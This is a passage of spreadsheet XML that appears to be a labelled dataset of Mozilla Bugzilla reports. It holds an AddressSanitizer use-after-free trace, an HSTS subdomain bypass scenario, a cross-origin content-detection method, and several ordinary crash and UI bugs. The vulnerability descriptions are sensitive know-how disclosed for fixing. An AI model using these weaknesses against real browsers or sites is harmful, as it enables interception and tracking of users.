    #1 0x7fa0e746d185 in SnowWhiteKiller::~SnowWhiteKiller() /home/nils/ffbuild/mozilla-central/xpcom/base/nsCycleCollector.cpp:2681:25
    #2 0x7fa0e745d03d in nsCycleCollector::FreeSnowWhite(bool) /home/nils/ffbuild/mozilla-central/xpcom/base/nsCycleCollector.cpp:2855:3
    #3 0x7fa0e74623b9 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/nils/ffbuild/mozilla-central/xpcom/base/nsCycleCollector.cpp:3832:3
    #4 0x7fa0e7461c32 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /home/nils/ffbuild/mozilla-central/xpcom/base/nsCycleCollector.cpp:3657:9
    #5 0x7fa0e7464b04 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/nils/ffbuild/mozilla-central/xpcom/base/nsCycleCollector.cpp:4151:21
    #6 0x7fa0eab8e22f in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/nils/ffbuild/mozilla-central/dom/base/nsJSEnvironment.cpp:1440:3
    #7 0x7fa0ea71211d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/nils/ffbuild/mozilla-central/dom/base/nsDOMWindowUtils.cpp:1338:3
    #8 0x7fa0e75b7c62 in NS_InvokeByIndex /home/nils/ffbuild/mozilla-central/xpcom/reflect/xptcall/md/unix/xptcinvoke_x86_64_unix.cpp:180:23
    #9 0x7fa0e96709ac in Invoke /home/nils/ffbuild/mozilla-central/js/xpconnect/src/XPCWrappedNative.cpp:2065:12
    #10 0x7fa0e96709ac in Call /home/nils/ffbuild/mozilla-central/js/xpconnect/src/XPCWrappedNative.cpp:1384
    #11 0x7fa0e96709ac in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/nils/ffbuild/mozilla-central/js/xpconnect/src/XPCWrappedNative.cpp:1351
    #12 0x7fa0e96778fe in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/nils/ffbuild/mozilla-central/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1143:12
    #13 0x7fa0f2d3f2fe in CallJSNative /home/nils/ffbuild/mozilla-central/js/src/jscntxtinlines.h:235:15
    #14 0x7fa0f2d3f2fe in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:454
    #15 0x7fa0f2d24a24 in CallFromStack /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:505:12
    #16 0x7fa0f2d24a24 in Interpret(JSContext*, js::RunState&amp;) /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:2916
    #17 0x7fa0f2d083d6 in js::RunScript(JSContext*, js::RunState&amp;) /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:400:12
    #18 0x7fa0f2d3fa7b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:472:15
    #19 0x7fa0f2d404e1 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:518:10
    #20 0x7fa0f283c058 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/nils/ffbuild/mozilla-central/js/src/jsapi.cpp:2776:12
    #21 0x7fa0e95b2698 in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/nils/ffbuild/mozilla-central/js/xpconnect/src/ExportHelpers.cpp:353:18
    #22 0x7fa0f2d3f2fe in CallJSNative /home/nils/ffbuild/mozilla-central/js/src/jscntxtinlines.h:235:15
    #23 0x7fa0f2d3f2fe in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:454
    #24 0x7fa0f2d24a24 in CallFromStack /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:505:12
    #25 0x7fa0f2d24a24 in Interpret(JSContext*, js::RunState&amp;) /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:2916
    #26 0x7fa0f2d083d6 in js::RunScript(JSContext*, js::RunState&amp;) /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:400:12
    #27 0x7fa0f2d3fa7b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:472:15
    #28 0x7fa0f2d404e1 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:518:10
    #29 0x7fa0f283e39d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/nils/ffbuild/mozilla-central/js/src/jsapi.cpp:2835:12
    #30 0x7fa0ec3fbc73 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /home/nils/ffbuild/mozilla-central/objdir-ff-asan/dom/bindings/EventListenerBinding.cpp:47:8
    #31 0x7fa0eccb1ccf in HandleEvent&lt;mozilla::dom::EventTarget *&gt; /home/nils/ffbuild/mozilla-central/objdir-ff-asan/dist/include/mozilla/dom/EventListenerBinding.h:64:12
    #32 0x7fa0eccb1ccf in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/nils/ffbuild/mozilla-central/dom/events/EventListenerManager.cpp:1133
    #33 0x7fa0eccb37bf in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/nils/ffbuild/mozilla-central/dom/events/EventListenerManager.cpp:1289:17
    #34 0x7fa0ecc9d663 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/nils/ffbuild/mozilla-central/dom/events/EventDispatcher.cpp:380:16
    #35 0x7fa0ecca10e5 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/nils/ffbuild/mozilla-central/dom/events/EventDispatcher.cpp:711:9
    #36 0x7fa0ea6d1996 in nsContentUtils::MaybeFireNodeRemoved(nsINode*, nsINode*, nsIDocument*) /home/nils/ffbuild/mozilla-central/dom/base/nsContentUtils.cpp:4237:5
previously allocated by thread T0 (Web Content) here:
    #0 0x4d3058 in __interceptor_malloc (/home/nils/ffbuild/mozilla-central/objdir-ff-asan/dist/bin/firefox+0x4d3058)
    #1 0x50e2dd in moz_xmalloc /home/nils/ffbuild/mozilla-central/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7fa0eaaaaf9f in operator new /home/nils/ffbuild/mozilla-central/objdir-ff-asan/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7fa0eaaaaf9f in nsIDocument::CreateTextNode(nsAString_internal const&amp;) const /home/nils/ffbuild/mozilla-central/dom/base/nsDocument.cpp:5511
    #4 0x7fa0eab77d64 in GetNodeFromNodeOrString /home/nils/ffbuild/mozilla-central/dom/base/nsINode.cpp:1667:18
    #5 0x7fa0eab77d64 in ConvertNodesOrStringsIntoNode(mozilla::dom::Sequence&lt;mozilla::dom::OwningNodeOrString&gt; const&amp;, nsIDocument*, mozilla::ErrorResult&amp;) /home/nils/ffbuild/mozilla-central/dom/base/nsINode.cpp:1685
    #6 0x7fa0eab7814b in nsINode::After(mozilla::dom::Sequence&lt;mozilla::dom::OwningNodeOrString&gt; const&amp;, mozilla::ErrorResult&amp;) /home/nils/ffbuild/mozilla-central/dom/base/nsINode.cpp:1785:5
    #7 0x7fa0ec4bf532 in mozilla::dom::ElementBinding::after(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Element*, JSJitMethodCallArgs const&amp;) /home/nils/ffbuild/mozilla-central/objdir-ff-asan/dom/bindings/ElementBinding.cpp:3578:9
    #8 0x7fa0ec895c22 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/nils/ffbuild/mozilla-central/dom/bindings/BindingUtils.cpp:2812:13
    #9 0x7fa0f2d3f2fe in CallJSNative /home/nils/ffbuild/mozilla-central/js/src/jscntxtinlines.h:235:15
    #10 0x7fa0f2d3f2fe in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:454
    #11 0x7fa0f2d24a24 in CallFromStack /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:505:12
    #12 0x7fa0f2d24a24 in Interpret(JSContext*, js::RunState&amp;) /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:2916
    #13 0x7fa0f2d083d6 in js::RunScript(JSContext*, js::RunState&amp;) /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:400:12
    #14 0x7fa0f2d3fa7b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:472:15
    #15 0x7fa0f2d404e1 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:518:10
    #16 0x7fa0f283e39d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/nils/ffbuild/mozilla-central/js/src/jsapi.cpp:2835:12
    #17 0x7fa0ec3f93f6 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/nils/ffbuild/mozilla-central/objdir-ff-asan/dom/bindings/EventHandlerBinding.cpp:259:37
    #18 0x7fa0ecce4313 in Call&lt;nsISupports *&gt; /home/nils/ffbuild/mozilla-central/objdir-ff-asan/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #19 0x7fa0ecce4313 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/nils/ffbuild/mozilla-central/dom/events/JSEventHandler.cpp:214
    #20 0x7fa0eccb1d16 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/nils/ffbuild/mozilla-central/dom/events/EventListenerManager.cpp:1136:51
    #21 0x7fa0eccb37bf in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/nils/ffbuild/mozilla-central/dom/events/EventListenerManager.cpp:1289:17
    #22 0x7fa0ecc9d663 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/nils/ffbuild/mozilla-central/dom/events/EventDispatcher.cpp:380:16
    #23 0x7fa0ecca10e5 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/nils/ffbuild/mozilla-central/dom/events/EventDispatcher.cpp:711:9
    #24 0x7fa0eeefc928 in nsDocumentViewer::LoadComplete(nsresult) /home/nils/ffbuild/mozilla-central/layout/base/nsDocumentViewer.cpp:998:7
    #25 0x7fa0efd7c3e9 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/nils/ffbuild/mozilla-central/docshell/base/nsDocShell.cpp:7606:21
    #26 0x7fa0efd786cf in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/nils/ffbuild/mozilla-central/docshell/base/nsDocShell.cpp:7406:7
    #27 0x7fa0efd7f5af in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/nils/ffbuild/mozilla-central/docshell/base/nsDocShell.cpp:7303:13
    #28 0x7fa0e9b211b9 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/nils/ffbuild/mozilla-central/uriloader/base/nsDocLoader.cpp:1255:3
    #29 0x7fa0e9b1ff6c in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/nils/ffbuild/mozilla-central/uriloader/base/nsDocLoader.cpp:840:14
    #30 0x7fa0e9b1ca6a in nsDocLoader::DocLoaderIsEmpty(bool) /home/nils/ffbuild/mozilla-central/uriloader/base/nsDocLoader.cpp:730:9
    #31 0x7fa0e9b1ed0c in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/nils/ffbuild/mozilla-central/uriloader/base/nsDocLoader.cpp:612:5
    #32 0x7fa0e9b1fb6c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/nils/ffbuild/mozilla-central/uriloader/base/nsDocLoader.cpp:468:14
    #33 0x7fa0e777268c in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/nils/ffbuild/mozilla-central/netwerk/base/nsLoadGroup.cpp:633:28
    #34 0x7fa0eaacc540 in nsDocument::DoUnblockOnload() /home/nils/ffbuild/mozilla-central/dom/base/nsDocument.cpp:8635:18
SUMMARY: AddressSanitizer: heap-use-after-free /home/nils/ffbuild/mozilla-central/dom/base/nsINode.h:929:12 in GetParentNode
Shadow bytes around the buggy address:
  0x0c1a8000c1f0: fd fd fd fa fa fa fa fa fa fa fa fa fd fd fd fd
  0x0c1a8000c200: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
  0x0c1a8000c210: fa fa fa fa fa fa fd fd fd fd fd fd fd fd fd fd
  0x0c1a8000c220: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
  0x0c1a8000c230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x0c1a8000c240: 00 00 fa fa fa fa fa fa fa fa fd fd fd fd fd[fd]
  0x0c1a8000c250: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
  0x0c1a8000c260: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1a8000c270: 00 00 00 00 00 fa fa fa fa fa fa fa fa fa 00 00
  0x0c1a8000c280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c1a8000c290: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00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6478==ABORTING</t>
        </is>
      </c>
      <c r="X2511" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2512">
      <c r="A2512" t="n">
        <v>16481</v>
      </c>
      <c r="B2512" t="inlineStr">
        <is>
          <t>1999-10-14 16:55:00 -0700</t>
        </is>
      </c>
      <c r="C2512" t="inlineStr">
        <is>
          <t>[DOGFOOD]Deleting text in table deletes table cells</t>
        </is>
      </c>
      <c r="D2512" t="inlineStr">
        <is>
          <t>2001-09-12 00:43:03 -0700</t>
        </is>
      </c>
      <c r="E2512" t="n">
        <v>1</v>
      </c>
      <c r="F2512" t="n">
        <v>1</v>
      </c>
      <c r="G2512" t="n">
        <v>3</v>
      </c>
      <c r="H2512" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2512" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2512" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K2512" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2512" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2512" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N2512" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2512" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2512" t="inlineStr">
        <is>
          <t>[PDT+][by 12/3]</t>
        </is>
      </c>
      <c r="Q2512" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2512" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2512" t="inlineStr">
        <is>
          <t>M12</t>
        </is>
      </c>
      <c r="T2512" t="n">
        <v>1</v>
      </c>
      <c r="U2512" t="n">
        <v>0</v>
      </c>
      <c r="V2512" t="n">
        <v>12</v>
      </c>
      <c r="W2512" t="inlineStr">
        <is>
          <t>When using the delete key or backspace to delete contents in a table cell,
after the last text character or element is deleted, the table cell is deleted.
It should not. It should skip over to the contents of the previous cell when
using backspace, or just stop deleting when using the delete key.
Otherwise holding down delete or backspace really messes up your table
structure!</t>
        </is>
      </c>
      <c r="X2512" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2513">
      <c r="A2513" t="n">
        <v>1886108</v>
      </c>
      <c r="B2513" t="inlineStr">
        <is>
          <t>2024-03-19 00:36:05 -0700</t>
        </is>
      </c>
      <c r="C2513" t="inlineStr">
        <is>
          <t>Detect Content Script of Cross-Origin using worker load-error messages</t>
        </is>
      </c>
      <c r="D2513" t="inlineStr">
        <is>
          <t>2024-09-18 19:40:32 -0700</t>
        </is>
      </c>
      <c r="E2513" t="n">
        <v>1</v>
      </c>
      <c r="F2513" t="n">
        <v>1</v>
      </c>
      <c r="G2513" t="n">
        <v>3</v>
      </c>
      <c r="H2513" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2513" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2513" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K2513" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2513" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2513" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2513" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2513" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2513" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [adv-main126+] [adv-ESR115.11+]</t>
        </is>
      </c>
      <c r="Q2513" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2513" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2513" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T2513" t="n">
        <v>1</v>
      </c>
      <c r="U2513" t="n">
        <v>0</v>
      </c>
      <c r="V2513" t="n">
        <v>24</v>
      </c>
      <c r="W2513" t="inlineStr">
        <is>
          <t>Created attachment 9391942
poc.html
On Firefox browser, a site could still detect content across cross-origin whether it is application/javascript using error messages. This is because of different variations of error messages. For example, if application/javascript is detected, Firefox produces the error: `NetworkError: WorkerGlobalScope.importScripts: Failed to load worker script at https://www.google-analytics.com/ (nsresult = 0x80530013).` If not, it produces the error: `NetworkError: A network error occurred.`
Steps to Reproduce:
1. Download the file `poc.html`.
2. Open `poc.html` in a Firefox browser, then copy and paste `https://www.google-analytics.com/analytics.js` into the input field and click "check" to see if it is detected. Repeat with just `https://www.google-analytics.com` to see not detected.</t>
        </is>
      </c>
      <c r="X2513" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2514">
      <c r="A2514" t="n">
        <v>1870262</v>
      </c>
      <c r="B2514" t="inlineStr">
        <is>
          <t>2023-12-15 05:42:26 -0800</t>
        </is>
      </c>
      <c r="C2514" t="inlineStr">
        <is>
          <t>HSTS policy on subdomain without includeSubDomains can bypass policy of upper domain</t>
        </is>
      </c>
      <c r="D2514" t="inlineStr">
        <is>
          <t>2024-06-21 15:23:17 -0700</t>
        </is>
      </c>
      <c r="E2514" t="n">
        <v>1</v>
      </c>
      <c r="F2514" t="n">
        <v>1</v>
      </c>
      <c r="G2514" t="n">
        <v>3</v>
      </c>
      <c r="H2514" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2514" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2514" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K2514" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2514" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2514" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2514" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2514" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2514" t="inlineStr">
        <is>
          <t>[adv-main122+][adv-esr115.7+]</t>
        </is>
      </c>
      <c r="Q2514" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2514" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2514" t="inlineStr">
        <is>
          <t>123 Branch</t>
        </is>
      </c>
      <c r="T2514" t="n">
        <v>1</v>
      </c>
      <c r="U2514" t="n">
        <v>1</v>
      </c>
      <c r="V2514" t="n">
        <v>18</v>
      </c>
      <c r="W2514" t="inlineStr">
        <is>
          <t>I believe I have found a security problem in the HSTS interpretation of Firefox.
Take the following three URLs (this is a live example on a test domain of mine; I intend to keep it functional until this issue is resolved):
* https://q2.re/ has an HSTS policy *with* includeSubDomains.
* https://sub.q2.re/ has an HSTS policy *without* includeSubDomains.
* http://plain.sub.q2.re/ has no HTTPS support.
If one opens these URLs in that order, it will open the last one over unencrypted HTTP.
It appears Firefox interprets the policy on the subdomain without includeSubDomains as a signal to unset HSTS for further sub-subdomains.
In my reading of the RFC 6797, this is wrong. The policy on the apex domain - with includeSubDomains - applies to all subdomains. The policy without includeSubDomains on the subdomain only applies to that specific host. It should not have any transitive effects on further subdomains.
Notably, this even works for preloaded domains. This severely breaks expectations. When one preloads a domain, it is expected that no unencrypted access is possible.
A plausible scenario where this could lead to an attack could look like this:
* https://example.com/ has a strict HSTS policy with includeSubDomains and may even be preloaded.
* https://example.com/ sets a cookie scoped for .example.com without a secure flag. (This is not unusual - there is advice out there that the secure flag is less important if one uses HSTS. This is e.g. implied by the Mozilla Observatory scoring.)
* Attacker looks for any subdomain of example.com with an HSTS policy without includeSubDomains. (This is also not unusual. The expectation may be that includeSubDomains is only important for the apex domain.)
I quickly found a live example on a popular page (netflix.com) where all criteria apply (though I do not know if the cookie is security relevant). I have not performed a thorough search for affected pages, I expect this to be very common.
Given it is close to the end of the year, I should say that I do not plan any short-term disclosure and do not expect any handling of this issue during Christmas and New Year time.</t>
        </is>
      </c>
      <c r="X2514" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2515">
      <c r="A2515" t="n">
        <v>1429207</v>
      </c>
      <c r="B2515" t="inlineStr">
        <is>
          <t>2018-01-09 12:30:17 -0800</t>
        </is>
      </c>
      <c r="C2515" t="inlineStr">
        <is>
          <t>Implement the "failure" screen for when the merchant rejects the payment and doesn't request retrying</t>
        </is>
      </c>
      <c r="D2515" t="inlineStr">
        <is>
          <t>2018-04-30 18:25:28 -0700</t>
        </is>
      </c>
      <c r="E2515" t="n">
        <v>1</v>
      </c>
      <c r="F2515" t="n">
        <v>1</v>
      </c>
      <c r="G2515" t="n">
        <v>2</v>
      </c>
      <c r="H2515" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2515" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2515" t="inlineStr">
        <is>
          <t>WebPayments UI</t>
        </is>
      </c>
      <c r="K2515" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2515" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2515" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2515" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2515" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2515" t="inlineStr">
        <is>
          <t>[webpayments]</t>
        </is>
      </c>
      <c r="Q2515" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2515" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2515" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T2515" t="n">
        <v>1</v>
      </c>
      <c r="U2515" t="n">
        <v>0</v>
      </c>
      <c r="V2515" t="n">
        <v>7</v>
      </c>
      <c r="W2515" t="inlineStr">
        <is>
          <t>After sending the PaymentResponse to the merchant via the DOM code, the merchant responds to indicate if the payment was accepted or rejected. If the front-end code receives `nsIPaymentActionResponse.PAYMENT_REJECTED` (retrying isn't supported) then failure UI should appear.
Retry (error recovery) support is being discussed in https://github.com/w3c/payment-request/issues/647</t>
        </is>
      </c>
      <c r="X2515" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2516">
      <c r="A2516" t="n">
        <v>756581</v>
      </c>
      <c r="B2516" t="inlineStr">
        <is>
          <t>2012-05-18 13:13:38 -0700</t>
        </is>
      </c>
      <c r="C2516" t="inlineStr">
        <is>
          <t>JS OOM Testing: Assertion failure: off &gt;= 0 &amp;&amp; (size_t) off &lt; size, at js/src/jsopcode.cpp:786</t>
        </is>
      </c>
      <c r="D2516" t="inlineStr">
        <is>
          <t>2013-04-30 18:47:52 -0700</t>
        </is>
      </c>
      <c r="E2516" t="n">
        <v>1</v>
      </c>
      <c r="F2516" t="n">
        <v>1</v>
      </c>
      <c r="G2516" t="n">
        <v>3</v>
      </c>
      <c r="H2516" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2516" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2516" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2516" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2516" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2516" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2516" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2516" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2516" t="inlineStr">
        <is>
          <t>[js:inv:p1][adv-main18+][qa-]</t>
        </is>
      </c>
      <c r="Q2516" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2516" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2516" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T2516" t="n">
        <v>1</v>
      </c>
      <c r="U2516" t="n">
        <v>0</v>
      </c>
      <c r="V2516" t="n">
        <v>19</v>
      </c>
      <c r="W2516" t="inlineStr">
        <is>
          <t>The following command asserts on mozilla-central revision f4d51fab6cec (dbg build):
js  -e 'const libdir = "/home/decoder/Mozilla/JSBugMon/repos/ionmonkey/js/src/jit-test/lib/";' -A 8202 -f /home/decoder/Mozilla/JSBugMon/repos/ionmonkey/js/src/jit-test/tests/for-of/decompiler.js</t>
        </is>
      </c>
      <c r="X2516" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2517">
      <c r="A2517" t="n">
        <v>893572</v>
      </c>
      <c r="B2517" t="inlineStr">
        <is>
          <t>2013-07-14 11:32:02 -0700</t>
        </is>
      </c>
      <c r="C2517" t="inlineStr">
        <is>
          <t>Canvas2D crash [@mozilla::gfx::DrawTargetCG::StrokeRect]</t>
        </is>
      </c>
      <c r="D2517" t="inlineStr">
        <is>
          <t>2017-01-27 11:26:11 -0800</t>
        </is>
      </c>
      <c r="E2517" t="n">
        <v>1</v>
      </c>
      <c r="F2517" t="n">
        <v>1</v>
      </c>
      <c r="G2517" t="n">
        <v>3</v>
      </c>
      <c r="H2517" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2517" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2517" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K2517" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
